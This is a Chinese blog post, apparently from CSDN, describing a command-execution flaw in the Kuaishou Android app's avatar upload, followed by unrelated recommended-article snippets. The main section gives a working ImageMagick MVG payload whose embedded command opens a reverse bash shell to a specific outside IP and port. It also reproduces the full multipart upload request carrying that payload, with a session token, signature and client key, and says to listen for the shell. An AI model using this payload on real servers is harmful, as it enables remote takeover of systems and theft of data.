Android动态命令执行漏洞,快手APP存在命令执行漏洞

最新推荐文章于 2023-03-19 20:51:08 发布
最新推荐文章于 2023-03-19 20:51:08 发布
阅读量400 收藏
点赞数
文章标签: Android动态命令执行漏洞

app头像上传处

传一张图抓包

把图片的内容改为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'

pop graphic-context

imgpxy.php?url=gpj.72bb70d86ce590b03716a7de02ffeaa34abb2b31d95b20ea61099475da70035101069433112e5c0c0e5335ab38e3062eeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

code 区域POST /rest/n/user/modify?lat=20.043384&lon=110.410347&ver=4.44&ud=234221710&sys=ANDROID_4.2.2&c=360APP&oc=360APP&net=WIFI&did=ANDROID_1072044643045168&mod=samsung%28GT-P5210%29&app=0&language=zh-cn&country_code=CN&appver=4.44.0.1323 HTTP/1.1

Accept-Language: zh-cn

User-Agent: kwai-android

Content-Type: multipart/form-data; boundary=8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Host: 180.186.38.200

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Length: 1159

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="token"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

9818721fb5db40cc9d5015e8d5d0f8d0-234221710

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="os"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

android

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="sig"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

9357092294a29fb6be75ec7884fb44d6

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="client_key"

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

3c2cd3f3

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK

Content-Disposition: form-data; name="file"; filename="avatar-1462541373042.png"

Content-Type: image/png; charset=UTF-8

Content-Transfer-Encoding: binary

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'

pop graphic-context

--8mW19hv6NU1G9T7JAID8WdxBd3Zz9WHMenQFmBK--

发包后在服务器上监听12345端口

imgpxy.php?url=gpj.f27f74efd56c85d6f7f17dd6d0a41d58a43d59f8fa70bee8ba76cd65951c3cfe8b2fae9a476eee1b421d23e14aef1dffeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

imgpxy.php?url=gpj.027f247f0c3882e4220c8a05a8eb68fbf594f9edae173798c9b29606fa0f967a1d5186b4bc437aa34c20bd258c8ee6deeaf759ba20cdd53b2a8032dc9ef13f7320610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

刘孟凯18299747005
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
快手app短视频数据提取和保存
06-22
Python爬虫 快手app短视频数据提取和保存
安全测试之命令执行漏洞【建议收藏】
HSS919的博客
03-16 197
命令执行漏洞就是服务器端没有对客户端用户输入的命令进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。为什么客户端能直接对服务器执行命令呢,因为在服务器安装的web程序,web框架和web组件等外部程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,就会使得用户通过外部程序直接编写和执行系统的命令函数。
用Python实现一个简单的批量无水印快手抖音批量下载器
鱼塘鱼汤的专栏
10-28 3683
文中介绍的方法仅限学习使用,切勿做非法用途 结合上一篇说了一个通过在手机上面搭建Http服务去破解App的密钥,如何真正的实现一个批量下载视频的功能呢? 我们用Python3简单的写了一个脚本,可以搜索特定用户,选择用户后,下载这个用户所有的视频。 项目地址:https://github.com/tbruceyu/AppCaller , 欢迎Star 关键接口 搜索用户的接口:http://...
token绕过
weixin_58782362的博客
02-11 6074
pikachu中token绕过
app漏洞扫描以及解决办法
qq_36173654的博客
10-17 1149
安装包签名【高危】 使用JDK中的jarsigner.exe检查安装包的签名。不安全。没有jar签名 解决办法:在android应用打包时同时采用V1 V2 签名 组件导出安全【低危待确认】 导出组件没有进行严格的访问控制,那么其它APP就可以通过调用这个导出组件的接口来访问原本没有声明权限的功能, 构成本地权限提升。 解决办法:避免不必要的组件导出。如果组件需要使用<intent-filter>,但不需要导出, 设置如下参数“android:exported="false"”。 输入记
token详解及常见防范措施;远程命令、代码执行漏洞原理及案例演示
qq_44696653的博客
05-05 1769
Token是如何防范CSRF的? CSRF的主要问题是敏感操作的链接容易被伪造,那么如何让这个链接不被伪造呢? 可以每次请求都增加一个随机码。 每次对敏感信息进行修改时后端都会调用一个函数随机生成一个随机码。 在pikachu实验平台进行实际的演示: 在csrf token模块登陆进行数据修改用burpsuite对操作进行抓包处理。 可以看到GET请求为GET /pikachu/vul/csrf/...
快手私信卡片android virtual虚拟机实现源码
01-11
快手私信卡片android virtual虚拟机实现源码
高仿快手APP
04-04
高仿快手的实现,用户可以浏览软件上的所有搞笑视频,可以进行关注,也可以进行下载,用户自己也可以自己录制短视频上传,支持微信分享。
快手App电商化运营存在的问题及对策探究.pdf
07-08
快手App电商化运营存在的问题及对策探究.pdf
浅析快手短视频APP营销存在的问题及对策.pdf
08-26
浅析快手短视频APP营销存在的问题及对策.pdf
移动App中常见的Web漏洞
weixin_30932215的博客
01-23 203
智能手机的存在让网民的生活从PC端开始往移动端转向,现在网民的日常生活需求基本上一部手机就能解决。外卖,办公,社交,银行转账等等都能通过移动端App实现。那么随之也带来了很多信息安全问题,大量的用户信息储存在移动App中,由于移动App的开发并不健全,由移动App引发的用户信息泄露事件也层出不穷。 移动App中的Web型漏洞主要分为以下几块: 1.SQL注入漏洞 这...
逻辑漏洞-token绕过
weixin_44110913的博客
10-29 1321
文章目录前端无回显前端有回显 前端无回显 看看是否有规律,是否可以爆破,一般都不行 前端有回显 以皮卡丘为例 查看前端源码发现token存在前端 抓包 添加爆破的位置 必须设置线程为1,因为如果多线程就是多个包token就不准了 点击该位置的always options中 在grep 位置添加找到token并添加token 1位置随便搞几个 token位置选这个 开始爆破,可以看见每次爆破token都不一样了 ...
渗透测试-安卓APP经验总结
aming小老弟
04-20 2337
安卓渗透经验
Android APP代码执行历史漏洞与攻击面分析
道阻且长,行则将至。
03-19 1535
为了挖掘 Android 端侧任意代码执行类型的漏洞,四处搜寻了相关的历史公开 CVE 漏洞,学习到了一些思路与方法,在此做下简要分析与总结。
android逆向快手,[原创] 快手签名-Android安全-看雪论坛-安全社区|安全招聘|bbs.pediy.com...
weixin_29574585的博客
06-03 3260
整理了下,发现还有个和达达类似套路的,一起看看吧。抓包发送短信验证码POST /rest/n/user/requestMobileCode?app=0&lon=146.3516&did_gt=1562212339132&c=MYAPP%2C1&sys=ANDROID_8.1&isp=&mod=LGE%28AOSP%20on%20TTOG%29&amp...
android加载efi分区,玩转Android-x86(安装启动、个性定制、高级运用)-8.5更新2楼分区挂载代码支持多硬盘...
weixin_39971132的博客
05-25 2094
玩转Android-x86(安装启动、个性定制、高级运用)安装篇本文并不是一篇高大上的教程,只是本人多年来的玩机经验总结,以及在不同系统、不同机型遇到的问题解决备忘录,本着“团结、互助、分享”的精神,现把我的经验贴出来,旨在与机友交流,或起到抛砖引玉的作用。PC安装Android-x86虽然不象实体手机(平板)那样有刷机ROOT变砖的风险,但仍然存在操作不当可能破坏原来的系统,导致重要的资料丢失或...
直播代码设置Android Button按下状态改变
云豹网络科技
05-22 211
button文字颜色改变 Button有一个方法setTextColor,那么我们需要设置一个选择器,就连可以 <?xml version="1.0" encoding="utf-8"?> <selector xmlns:android="http://schemas.android.com/apk/res/android" > <!--按钮文件按下的颜色--> <item android:state_pressed="true" android:c
网络安全——命令执行漏洞概述
weixin_54055099的博客
09-17 2465
命令执行漏洞的概述,管道符号在LINUX和Windows的用户
快应用开发中的一些注意事项和坑
青蛙背蝎子过河的博客
07-07 984
最近公司在开发一款快应用, 第三版已经上线. 期间也踩了不少坑. 特地发出来 , 希望能帮助一些新手同学; 今天简单聊一下, 以后再逐条详细说下 需要说明的是 这些注意的点都是在1040的版本中的问题 目前快应用已升级1050版本 因要考虑大多机型的兼容性 我司还未升级 所以以下仅限于1040版本中的问题 另外 联盟的编辑器和华为的编辑器报错的机...
基于android的仿快手app
最新发布
05-13
实现一个基于Android的仿快手App需要掌握以下技术: 1. Java语言:Android开发主要使用Java语言,需要掌握Java语法和面向对象编程思想。 2. Android开发框架:Android开发需要掌握Android开发框架,包括Activity、Service、BroadcastReceiver、Content Provider等组件和UI组件。 3. 媒体处理:快手App主要以短视频为主,需要掌握Android媒体处理技术,包括视频录制、音频录制、视频剪辑等。 4. 网络开发:快手App需要联网获取视频数据,需要掌握Android网络开发技术,包括HTTP协议、Socket编程、JSON数据解析等。 5. 数据库操作:需要掌握Android数据库操作技术,包括SQLite数据库的操作、ORM框架等。 6. UI设计:需要掌握Android UI设计技术,包括XML布局、控件使用、样式设计等。 总体来说,仿快手App需要综合运用以上技术,其中最核心的技术包括媒体处理和网络开发。如果您是初学者,可以从基础的Android开发开始学起,逐步深入学习相关技术,再尝试仿制快手App

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值